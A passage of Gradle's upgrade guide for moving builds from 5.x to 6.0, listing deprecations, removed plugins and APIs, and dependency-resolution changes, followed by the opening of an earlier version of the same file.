build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilar, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n\n==== buildSrc classes are no longer visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated, use `validatePlugins` instead.\n The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n `embedded-kotlin`\n}\n\nrepositories {\n jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use, however they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to not include timestamps by default any more.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when running Checkstyle.\n\n==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior let to broken Gradle Module Metadata and was difficult to understand due to different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before - e.g. by setting `jar.archiveExtension.set(pomPackaging)`.\n\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate` and emits a deprecation warning. This scenario will become an error in Gradle 7.0.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n=== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follow the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions are no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","old_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and ordering issue which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output annotation. This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` has been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 